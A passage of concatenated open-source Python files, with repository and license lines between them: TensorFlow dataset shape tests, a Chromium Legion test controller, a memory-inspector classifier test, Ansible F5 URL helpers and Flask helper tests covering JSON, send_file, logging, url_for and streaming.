def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(5).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
expected_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 4)))
result = dataset.apply(batching.assert_element_shape(expected_shapes))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(3).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 10)))
iterator = dataset_ops.make_initializable_iterator(
dataset.apply(batching.assert_element_shape(wrong_shapes)))
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
def test_assert_partial_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(5).map(create_dataset)
partial_expected_shape = (
tensor_shape.TensorShape(None), # Unknown shape
tensor_shape.TensorShape((None, 4))) # Partial shape
result = dataset.apply(
batching.assert_element_shape(partial_expected_shape))
# Partial shapes are merged with actual shapes:
actual_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 4)))
self.assertEqual(actual_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_partial_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(3).map(create_dataset)
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((None, 10)))
with self.assertRaises(ValueError):
dataset.apply(batching.assert_element_shape(wrong_shapes))
def test_assert_partial_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(5).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
expected_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((None, 4)))
result = dataset.apply(batching.assert_element_shape(expected_shapes))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_partial_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(3).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((None, 10)))
iterator = dataset_ops.make_initializable_iterator(
dataset.apply(batching.assert_element_shape(wrong_shapes)))
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
| apache-2.0 |
hgl888/chromium-crosswalk | testing/chromoting/multi_machine_example/example_test_controller.py | 31 | 5717 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The test controller for the chromoting localhost browser_tests.
This test uses the legion framework to setup this controller which will run
the chromoting_integration_tests on a task machine. This is intended to be an
example Legion-based test for the chromoting team.
The controller will start a task machine to run browser_tests_launcher on. The
output of these tests are streamed back to the test controller to be output
on the controller's stdout and stderr channels. The final test output is then
read and becomes the final output of the controller, mirroring the test's
pass/fail result.
"""
import argparse
import logging
import os
import sys
import time
# Map the legion directory so we can import the host controller.
SRC_DIR = os.path.join('..', '..', '..')
sys.path.append(os.path.join(SRC_DIR, 'testing'))
from legion import test_controller
class ExampleController(test_controller.TestController):
"""The test controller for the Chromoting browser_tests."""
def __init__(self):
super(ExampleController, self).__init__()
self.task = None
self.args = None
def RunTest(self):
"""Main method to run the test code."""
self.ParseArgs()
self.CreateTask()
self.TestIntegrationTests()
def CreateBrowserTestsLauncherCommand(self):
return [
'python',
self.TaskAbsPath('../browser_tests_launcher.py'),
'--commands_file', self.TaskAbsPath(self.args.commands_file),
'--prod_dir', self.TaskAbsPath(self.args.prod_dir),
'--cfg_file', self.TaskAbsPath(self.args.cfg_file),
'--me2me_manifest_file', self.TaskAbsPath(
self.args.me2me_manifest_file),
'--it2me_manifest_file', self.TaskAbsPath(
self.args.it2me_manifest_file),
'--user_profile_dir', self.args.user_profile_dir,
]
def TaskAbsPath(self, path):
"""Returns the absolute path to the resource on the task machine.
Args:
path: The relative path to the resource.
Since the test controller and the task machines run in different tmp dirs
on different machines the absolute path cannot be calculated correctly on
this machine. This function maps the relative path (from this directory)
to an absolute path on the task machine.
"""
return self.task.rpc.AbsPath(path)
def CreateTask(self):
"""Creates a task object and sets the proper values."""
self.task = self.CreateNewTask(
isolated_hash=self.args.task_machine,
dimensions={'os': 'Ubuntu-14.04', 'pool': 'Chromoting'})
self.task.Create()
self.task.WaitForConnection()
def ParseArgs(self):
"""Gets the command line args."""
parser = argparse.ArgumentParser()
parser.add_argument('--task_machine',
help='isolated hash of the task machine.')
# The rest of the args are taken from
# testing/chromoting/browser_tests_launcher.py.
parser.add_argument('-f', '--commands_file',
help='path to file listing commands to be launched.')
parser.add_argument('-p', '--prod_dir',
help='path to folder having product and test binaries.')
parser.add_argument('-c', '--cfg_file',
help='path to test host config file.')
parser.add_argument('--me2me_manifest_file',
help='path to me2me host manifest file.')
parser.add_argument('--it2me_manifest_file',
help='path to it2me host manifest file.')
parser.add_argument(
'-u', '--user_profile_dir',
help='path to user-profile-dir, used by connect-to-host tests.')
self.args, _ = parser.parse_known_args()
def TestIntegrationTests(self):
"""Runs the integration tests via browser_tests_launcher.py."""
# Create a process object, configure it, and start it.
# All interactions with the process are based on this "proc" key.
proc = self.task.rpc.subprocess.Process(
self.CreateBrowserTestsLauncherCommand())
# Set the cwd to browser_tests_launcher relative to this directory.
# This allows browser_test_launcher to use relative paths.
self.task.rpc.subprocess.SetCwd(proc, '../')
# Set the task verbosity to true to allow stdout/stderr to be echo'ed to
# run_task's stdout/stderr on the task machine. This can assist in
# debugging.
self.task.rpc.subprocess.SetVerbose(proc)
# Set the process as detached to create it in a new process group.
self.task.rpc.subprocess.SetDetached(proc)
# Start the actual process on the task machine.
self.task.rpc.subprocess.Start(proc)
# Collect the stdout/stderr and emit it from this controller while the
# process is running.
while self.task.rpc.subprocess.Poll(proc) is None:
# Output the test's stdout and stderr in semi-realtime.
# This is not true realtime due to the RPC calls and the 1s sleep.
stdout, stderr = self.task.rpc.subprocess.ReadOutput(proc)
if stdout:
sys.stdout.write(stdout)
if stderr:
sys.stderr.write(stderr)
time.sleep(1)
# Get the return code, clean up the process object.
returncode = self.task.rpc.subprocess.GetReturncode(proc)
self.task.rpc.subprocess.Delete(proc)
# Pass or fail depending on the return code from the browser_tests_launcher.
if returncode != 0:
raise AssertionError('browser_tests_launcher failed with return code '
'%i' % returncode)
if __name__ == '__main__':
ExampleController().RunController()
| bsd-3-clause |
Workday/OpenFrame | tools/memory_inspector/memory_inspector/classification/mmap_classifier_unittest.py | 109 | 3441 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from memory_inspector.classification import mmap_classifier
from memory_inspector.core import memory_map
_TEST_RULES = """
[
{
'name': 'anon',
'mmap_file': r'^\[anon',
'children': [
{
'name': 'jit',
'mmap_prot': 'r-x',
},
],
},
{
'name': 'dev',
'mmap_file': r'^/dev',
'children': [
{
'name': 'gpu',
'mmap_file': r'/gpu',
},
],
},
{
'name': 'lib',
'mmap_file': r'.so$',
'children': [
{
'name': 'data',
'mmap_prot': 'rw',
},
{
'name': 'text',
'mmap_prot': 'r-x',
},
],
},
]
"""
_TEST_MMAPS = [
# START END PROT FILE P.Dirt P.Clean S.Dirt S.Clean
(0x00000, 0x03fff, 'rw--', '[anon]', 4096, 0, 4096, 0),
(0x04000, 0x07fff, 'rw--', '/lib/1.so', 8192, 0, 0, 0),
(0x08000, 0x0bfff, 'r-x-', '/lib/1.so', 4096, 8192, 0, 0),
(0x0c000, 0x0ffff, 'rw--', '/lib/2.so', 0, 0, 4096, 8192),
(0x10000, 0x13fff, 'r-x-', '/lib/2.so', 0, 12288, 0, 4096),
(0x14000, 0x17fff, 'rw--', '/dev/gpu/1', 4096, 0, 0, 0),
(0x18000, 0x1bfff, 'rw--', '/dev/gpu/2', 8192, 0, 4096, 0),
(0x1c000, 0x1ffff, 'rw--', '/dev/foo', 0, 4096, 0, 8192),
(0x20000, 0x23fff, 'r-x-', '[anon:jit]', 8192, 0, 4096, 0),
(0x24000, 0x27fff, 'r---', 'OTHER', 0, 0, 8192, 0),
]
_EXPECTED_RESULTS = {
'Total': [36864, 24576, 24576, 20480],
'Total::anon': [12288, 0, 8192, 0],
'Total::anon::jit': [8192, 0, 4096, 0],
'Total::anon::anon-other': [4096, 0, 4096, 0],
'Total::dev': [12288, 4096, 4096, 8192],
'Total::dev::gpu': [12288, 0, 4096, 0],
'Total::dev::dev-other': [0, 4096, 0, 8192],
'Total::lib': [12288, 20480, 4096, 12288],
'Total::lib::data': [8192, 0, 4096, 8192],
'Total::lib::text': [4096, 20480, 0, 4096],
'Total::lib::lib-other': [0, 0, 0, 0],
'Total::Total-other': [0, 0, 8192, 0],
}
class MmapClassifierTest(unittest.TestCase):
def runTest(self):
rule_tree = mmap_classifier.LoadRules(_TEST_RULES)
mmap = memory_map.Map()
for m in _TEST_MMAPS:
mmap.Add(memory_map.MapEntry(
m[0], m[1], m[2], m[3], 0, m[4], m[5], m[6], m[7]))
res = mmap_classifier.Classify(mmap, rule_tree)
def CheckResult(node, prefix):
node_name = prefix + node.name
self.assertIn(node_name, _EXPECTED_RESULTS)
subtotal = node.values[0]
values = node.values[1:]
# First check that the subtotal matches clean + dirty + shared + priv.
self.assertEqual(subtotal, values[0] + values[1] + values[2] + values[3])
# Then check that the single values match the expectations.
self.assertEqual(values, _EXPECTED_RESULTS[node_name])
for child in node.children:
CheckResult(child, node_name + '::')
CheckResult(res.total, '') | bsd-3-clause |
vmindru/ansible | lib/ansible/module_utils/network/f5/urls.py | 60 | 4623 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
try:
from library.module_utils.network.f5.common import F5ModuleError
except ImportError:
from ansible.module_utils.network.f5.common import F5ModuleError
_CLEAN_HEADER_REGEX_BYTE = re.compile(b'^\\S[^\\r\\n]*$|^$')
_CLEAN_HEADER_REGEX_STR = re.compile(r'^\S[^\r\n]*$|^$')
def check_header_validity(header):
"""Verifies that header value is a string which doesn't contain
leading whitespace or return characters.
NOTE: This is a slightly modified version of the original function
taken from the requests library:
http://docs.python-requests.org/en/master/_modules/requests/utils/
:param header: string containing ':'.
"""
try:
name, value = header.split(':')
except ValueError:
raise F5ModuleError('Invalid header format: {0}'.format(header))
if name == '':
raise F5ModuleError('Invalid header format: {0}'.format(header))
if isinstance(value, bytes):
pat = _CLEAN_HEADER_REGEX_BYTE
else:
pat = _CLEAN_HEADER_REGEX_STR
try:
if not pat.match(value):
raise F5ModuleError("Invalid return character or leading space in header: %s" % name)
except TypeError:
raise F5ModuleError("Value for header {%s: %s} must be of type str or "
"bytes, not %s" % (name, value, type(value)))
def build_service_uri(base_uri, partition, name):
"""Build the proper uri for a service resource.
This follows the scheme:
<base_uri>/~<partition>~<<name>.app>~<name>
:param base_uri: str -- base uri of the REST endpoint
:param partition: str -- partition for the service
:param name: str -- name of the service
:returns: str -- uri to access the service
"""
name = name.replace('/', '~')
return '%s~%s~%s.app~%s' % (base_uri, partition, name, name)
def parseStats(entry):
if 'description' in entry:
return entry['description']
elif 'value' in entry:
return entry['value']
elif 'entries' in entry or 'nestedStats' in entry and 'entries' in entry['nestedStats']:
if 'entries' in entry:
entries = entry['entries']
else:
entries = entry['nestedStats']['entries']
result = None
for name in entries:
entry = entries[name]
if 'https://localhost' in name:
name = name.split('/')
name = name[-1]
if result and isinstance(result, list):
result.append(parseStats(entry))
elif result and isinstance(result, dict):
result[name] = parseStats(entry)
else:
try:
int(name)
result = list()
result.append(parseStats(entry))
except ValueError:
result = dict()
result[name] = parseStats(entry)
else:
if '.' in name:
names = name.split('.')
key = names[0]
value = names[1]
if result is None:
# result can be None if this branch is reached first
#
# For example, the mgmt/tm/net/trunk/NAME/stats API
# returns counters.bitsIn before anything else.
result = dict()
result[key] = dict()
elif key not in result:
result[key] = dict()
elif result[key] is None:
result[key] = dict()
result[key][value] = parseStats(entry)
else:
if result and isinstance(result, list):
result.append(parseStats(entry))
elif result and isinstance(result, dict):
result[name] = parseStats(entry)
else:
try:
int(name)
result = list()
result.append(parseStats(entry))
except ValueError:
result = dict()
result[name] = parseStats(entry)
return result
| gpl-3.0 |
i5on9i/echoserver | lib/flask/testsuite/helpers.py | 146 | 21657 | # -*- coding: utf-8 -*-
"""
flask.testsuite.helpers
~~~~~~~~~~~~~~~~~~~~~~~
Various helpers.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import flask
import unittest
from logging import StreamHandler
from flask.testsuite import FlaskTestCase, catch_warnings, catch_stderr
from werkzeug.http import parse_cache_control_header, parse_options_header
from flask._compat import StringIO, text_type
def has_encoding(name):
try:
import codecs
codecs.lookup(name)
return True
except LookupError:
return False
class JSONTestCase(FlaskTestCase):
def test_json_bad_requests(self):
app = flask.Flask(__name__)
@app.route('/json', methods=['POST'])
def return_json():
return flask.jsonify(foo=text_type(flask.request.get_json()))
c = app.test_client()
rv = c.post('/json', data='malformed', content_type='application/json')
self.assert_equal(rv.status_code, 400)
def test_json_body_encoding(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
return flask.request.get_json()
c = app.test_client()
resp = c.get('/', data=u'"Hällo Wörld"'.encode('iso-8859-15'),
content_type='application/json; charset=iso-8859-15')
self.assert_equal(resp.data, u'Hällo Wörld'.encode('utf-8'))
def test_jsonify(self):
d = dict(a=23, b=42, c=[1, 2, 3])
app = flask.Flask(__name__)
@app.route('/kw')
def return_kwargs():
return flask.jsonify(**d)
@app.route('/dict')
def return_dict():
return flask.jsonify(d)
c = app.test_client()
for url in '/kw', '/dict':
rv = c.get(url)
self.assert_equal(rv.mimetype, 'application/json')
self.assert_equal(flask.json.loads(rv.data), d)
def test_json_as_unicode(self):
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = True
with app.app_context():
rv = flask.json.dumps(u'\N{SNOWMAN}')
self.assert_equal(rv, '"\\u2603"')
app.config['JSON_AS_ASCII'] = False
with app.app_context():
rv = flask.json.dumps(u'\N{SNOWMAN}')
self.assert_equal(rv, u'"\u2603"')
def test_json_attr(self):
app = flask.Flask(__name__)
@app.route('/add', methods=['POST'])
def add():
json = flask.request.get_json()
return text_type(json['a'] + json['b'])
c = app.test_client()
rv = c.post('/add', data=flask.json.dumps({'a': 1, 'b': 2}),
content_type='application/json')
self.assert_equal(rv.data, b'3')
def test_template_escaping(self):
app = flask.Flask(__name__)
render = flask.render_template_string
with app.test_request_context():
rv = flask.json.htmlsafe_dumps('</script>')
self.assert_equal(rv, u'"\\u003c/script\\u003e"')
self.assert_equal(type(rv), text_type)
rv = render('{{ "</script>"|tojson }}')
self.assert_equal(rv, '"\\u003c/script\\u003e"')
rv = render('{{ "<\0/script>"|tojson }}')
self.assert_equal(rv, '"\\u003c\\u0000/script\\u003e"')
rv = render('{{ "<!--<script>"|tojson }}')
self.assert_equal(rv, '"\\u003c!--\\u003cscript\\u003e"')
rv = render('{{ "&"|tojson }}')
self.assert_equal(rv, '"\\u0026"')
def test_json_customization(self):
class X(object):
def __init__(self, val):
self.val = val
class MyEncoder(flask.json.JSONEncoder):
def default(self, o):
if isinstance(o, X):
return '<%d>' % o.val
return flask.json.JSONEncoder.default(self, o)
class MyDecoder(flask.json.JSONDecoder):
def __init__(self, *args, **kwargs):
kwargs.setdefault('object_hook', self.object_hook)
flask.json.JSONDecoder.__init__(self, *args, **kwargs)
def object_hook(self, obj):
if len(obj) == 1 and '_foo' in obj:
return X(obj['_foo'])
return obj
app = flask.Flask(__name__)
app.testing = True
app.json_encoder = MyEncoder
app.json_decoder = MyDecoder
@app.route('/', methods=['POST'])
def index():
return flask.json.dumps(flask.request.get_json()['x'])
c = app.test_client()
rv = c.post('/', data=flask.json.dumps({
'x': {'_foo': 42}
}), content_type='application/json')
self.assertEqual(rv.data, b'"<42>"')
def test_modified_url_encoding(self):
class ModifiedRequest(flask.Request):
url_charset = 'euc-kr'
app = flask.Flask(__name__)
app.testing = True
app.request_class = ModifiedRequest
app.url_map.charset = 'euc-kr'
@app.route('/')
def index():
return flask.request.args['foo']
rv = app.test_client().get(u'/?foo=정상처리'.encode('euc-kr'))
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, u'정상처리'.encode('utf-8'))
if not has_encoding('euc-kr'):
test_modified_url_encoding = None
def test_json_key_sorting(self):
app = flask.Flask(__name__)
app.testing = True
self.assert_equal(app.config['JSON_SORT_KEYS'], True)
d = dict.fromkeys(range(20), 'foo')
@app.route('/')
def index():
return flask.jsonify(values=d)
c = app.test_client()
rv = c.get('/')
lines = [x.strip() for x in rv.data.strip().decode('utf-8').splitlines()]
self.assert_equal(lines, [
'{',
'"values": {',
'"0": "foo",',
'"1": "foo",',
'"2": "foo",',
'"3": "foo",',
'"4": "foo",',
'"5": "foo",',
'"6": "foo",',
'"7": "foo",',
'"8": "foo",',
'"9": "foo",',
'"10": "foo",',
'"11": "foo",',
'"12": "foo",',
'"13": "foo",',
'"14": "foo",',
'"15": "foo",',
'"16": "foo",',
'"17": "foo",',
'"18": "foo",',
'"19": "foo"',
'}',
'}'
])
class SendfileTestCase(FlaskTestCase):
def test_send_file_regular(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.send_file('static/index.html')
self.assert_true(rv.direct_passthrough)
self.assert_equal(rv.mimetype, 'text/html')
with app.open_resource('static/index.html') as f:
rv.direct_passthrough = False
self.assert_equal(rv.data, f.read())
rv.close()
def test_send_file_xsendfile(self):
app = flask.Flask(__name__)
app.use_x_sendfile = True
with app.test_request_context():
rv = flask.send_file('static/index.html')
self.assert_true(rv.direct_passthrough)
self.assert_in('x-sendfile', rv.headers)
self.assert_equal(rv.headers['x-sendfile'],
os.path.join(app.root_path, 'static/index.html'))
self.assert_equal(rv.mimetype, 'text/html')
rv.close()
def test_send_file_object(self):
app = flask.Flask(__name__)
with catch_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f)
rv.direct_passthrough = False
with app.open_resource('static/index.html') as f:
self.assert_equal(rv.data, f.read())
self.assert_equal(rv.mimetype, 'text/html')
rv.close()
# mimetypes + etag
self.assert_equal(len(captured), 2)
app.use_x_sendfile = True
with catch_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f)
self.assert_equal(rv.mimetype, 'text/html')
self.assert_in('x-sendfile', rv.headers)
self.assert_equal(rv.headers['x-sendfile'],
os.path.join(app.root_path, 'static/index.html'))
rv.close()
# mimetypes + etag
self.assert_equal(len(captured), 2)
app.use_x_sendfile = False
with app.test_request_context():
with catch_warnings() as captured:
f = StringIO('Test')
rv = flask.send_file(f)
rv.direct_passthrough = False
self.assert_equal(rv.data, b'Test')
self.assert_equal(rv.mimetype, 'application/octet-stream')
rv.close()
# etags
self.assert_equal(len(captured), 1)
with catch_warnings() as captured:
f = StringIO('Test')
rv = flask.send_file(f, mimetype='text/plain')
rv.direct_passthrough = False
self.assert_equal(rv.data, b'Test')
self.assert_equal(rv.mimetype, 'text/plain')
rv.close()
# etags
self.assert_equal(len(captured), 1)
app.use_x_sendfile = True
with catch_warnings() as captured:
with app.test_request_context():
f = StringIO('Test')
rv = flask.send_file(f)
self.assert_not_in('x-sendfile', rv.headers)
rv.close()
# etags
self.assert_equal(len(captured), 1)
def test_attachment(self):
app = flask.Flask(__name__)
with catch_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f, as_attachment=True)
value, options = parse_options_header(rv.headers['Content-Disposition'])
self.assert_equal(value, 'attachment')
rv.close()
# mimetypes + etag
self.assert_equal(len(captured), 2)
with app.test_request_context():
self.assert_equal(options['filename'], 'index.html')
rv = flask.send_file('static/index.html', as_attachment=True)
value, options = parse_options_header(rv.headers['Content-Disposition'])
self.assert_equal(value, 'attachment')
self.assert_equal(options['filename'], 'index.html')
rv.close()
with app.test_request_context():
rv = flask.send_file(StringIO('Test'), as_attachment=True,
attachment_filename='index.txt',
add_etags=False)
self.assert_equal(rv.mimetype, 'text/plain')
value, options = parse_options_header(rv.headers['Content-Disposition'])
self.assert_equal(value, 'attachment')
self.assert_equal(options['filename'], 'index.txt')
rv.close()
def test_static_file(self):
app = flask.Flask(__name__)
# default cache timeout is 12 hours
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 12 * 60 * 60)
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 12 * 60 * 60)
rv.close()
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 3600
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 3600)
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 3600)
rv.close()
class StaticFileApp(flask.Flask):
def get_send_file_max_age(self, filename):
return 10
app = StaticFileApp(__name__)
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 10)
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
self.assert_equal(cc.max_age, 10)
rv.close()
class LoggingTestCase(FlaskTestCase):
def test_logger_cache(self):
app = flask.Flask(__name__)
logger1 = app.logger
self.assert_true(app.logger is logger1)
self.assert_equal(logger1.name, __name__)
app.logger_name = __name__ + '/test_logger_cache'
self.assert_true(app.logger is not logger1)
def test_debug_log(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
app.logger.warning('the standard library is dead')
app.logger.debug('this is a debug statement')
return ''
@app.route('/exc')
def exc():
1 // 0
with app.test_client() as c:
with catch_stderr() as err:
c.get('/')
out = err.getvalue()
self.assert_in('WARNING in helpers [', out)
self.assert_in(os.path.basename(__file__.rsplit('.', 1)[0] + '.py'), out)
self.assert_in('the standard library is dead', out)
self.assert_in('this is a debug statement', out)
with catch_stderr() as err:
try:
c.get('/exc')
except ZeroDivisionError:
pass
else:
self.assert_true(False, 'debug log ate the exception')
def test_debug_log_override(self):
app = flask.Flask(__name__)
app.debug = True
app.logger_name = 'flask_tests/test_debug_log_override'
app.logger.level = 10
self.assert_equal(app.logger.level, 10)
def test_exception_logging(self):
out = StringIO()
app = flask.Flask(__name__)
app.logger_name = 'flask_tests/test_exception_logging'
app.logger.addHandler(StreamHandler(out))
@app.route('/')
def index():
1 // 0
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_in(b'Internal Server Error', rv.data)
err = out.getvalue()
self.assert_in('Exception on / [GET]', err)
self.assert_in('Traceback (most recent call last):', err)
self.assert_in('1 // 0', err)
self.assert_in('ZeroDivisionError:', err)
def test_processor_exceptions(self):
app = flask.Flask(__name__)
@app.before_request
def before_request():
if trigger == 'before':
1 // 0
@app.after_request
def after_request(response):
if trigger == 'after':
1 // 0
return response
@app.route('/')
def index():
return 'Foo'
@app.errorhandler(500)
def internal_server_error(e):
return 'Hello Server Error', 500
for trigger in 'before', 'after':
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_equal(rv.data, b'Hello Server Error')
def test_url_for_with_anchor(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
self.assert_equal(flask.url_for('index', _anchor='x y'),
'/#x%20y')
def test_url_for_with_scheme(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
self.assert_equal(flask.url_for('index',
_external=True,
_scheme='https'),
'https://localhost/')
def test_url_for_with_scheme_not_external(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
self.assert_raises(ValueError,
flask.url_for,
'index',
_scheme='https')
    def test_url_with_method(self):
        # url_for() must disambiguate between several rules sharing the same
        # endpoint ('myview') by honouring the ``_method`` argument.
        from flask.views import MethodView
        app = flask.Flask(__name__)
        class MyView(MethodView):
            def get(self, id=None):
                # One GET rule without id (list) and one with id (detail).
                if id is None:
                    return 'List'
                return 'Get %d' % id
            def post(self):
                return 'Create'
        myview = MyView.as_view('myview')
        app.add_url_rule('/myview/', methods=['GET'],
                         view_func=myview)
        app.add_url_rule('/myview/<int:id>', methods=['GET'],
                         view_func=myview)
        app.add_url_rule('/myview/create', methods=['POST'],
                         view_func=myview)
        with app.test_request_context():
            self.assert_equal(flask.url_for('myview', _method='GET'),
                              '/myview/')
            self.assert_equal(flask.url_for('myview', id=42, _method='GET'),
                              '/myview/42')
            self.assert_equal(flask.url_for('myview', _method='POST'),
                              '/myview/create')
class NoImportsTestCase(FlaskTestCase):
    """Ensure creating a Flask instance never imports ``import_name``.

    Avoiding ``__import__`` lets Flask objects be built even for modules that
    fail at import time; those runtime errors surface soon enough anyway, and
    tools constructing apps meta-programmatically depend on this.  File paths
    and module metadata should instead come from ``pkgutil`` and ``imp``.
    """

    def test_name_with_import_error(self):
        # 'importerror' is a test module that raises when imported; if the
        # constructor tried to import it we would land in the except branch.
        try:
            flask.Flask('importerror')
        except NotImplementedError:
            self.fail('Flask(import_name) is importing import_name.')
class StreamingTestCase(FlaskTestCase):
    # Tests for flask.stream_with_context(): streaming a generator response
    # while keeping the request context pushed for the generator's lifetime.

    def test_streaming_with_context(self):
        app = flask.Flask(__name__)
        app.testing = True
        @app.route('/')
        def index():
            def generate():
                yield 'Hello '
                # Reading flask.request here only works because
                # stream_with_context keeps the request context alive while
                # the response is being iterated.
                yield flask.request.args['name']
                yield '!'
            return flask.Response(flask.stream_with_context(generate()))
        c = app.test_client()
        rv = c.get('/?name=World')
        self.assertEqual(rv.data, b'Hello World!')
    def test_streaming_with_context_as_decorator(self):
        # Same behavior, but using stream_with_context as a generator-function
        # decorator instead of wrapping an existing generator object.
        app = flask.Flask(__name__)
        app.testing = True
        @app.route('/')
        def index():
            @flask.stream_with_context
            def generate():
                yield 'Hello '
                yield flask.request.args['name']
                yield '!'
            return flask.Response(generate())
        c = app.test_client()
        rv = c.get('/?name=World')
        self.assertEqual(rv.data, b'Hello World!')
    def test_streaming_with_context_and_custom_close(self):
        # A wrapped iterator with its own close() must still have that
        # close() invoked when the streamed response is exhausted.
        app = flask.Flask(__name__)
        app.testing = True
        called = []
        class Wrapper(object):
            def __init__(self, gen):
                self._gen = gen
            def __iter__(self):
                return self
            def close(self):
                # Record that the response machinery called close().
                called.append(42)
            def __next__(self):
                return next(self._gen)
            next = __next__  # Python 2 iterator protocol alias.
        @app.route('/')
        def index():
            def generate():
                yield 'Hello '
                yield flask.request.args['name']
                yield '!'
            return flask.Response(flask.stream_with_context(
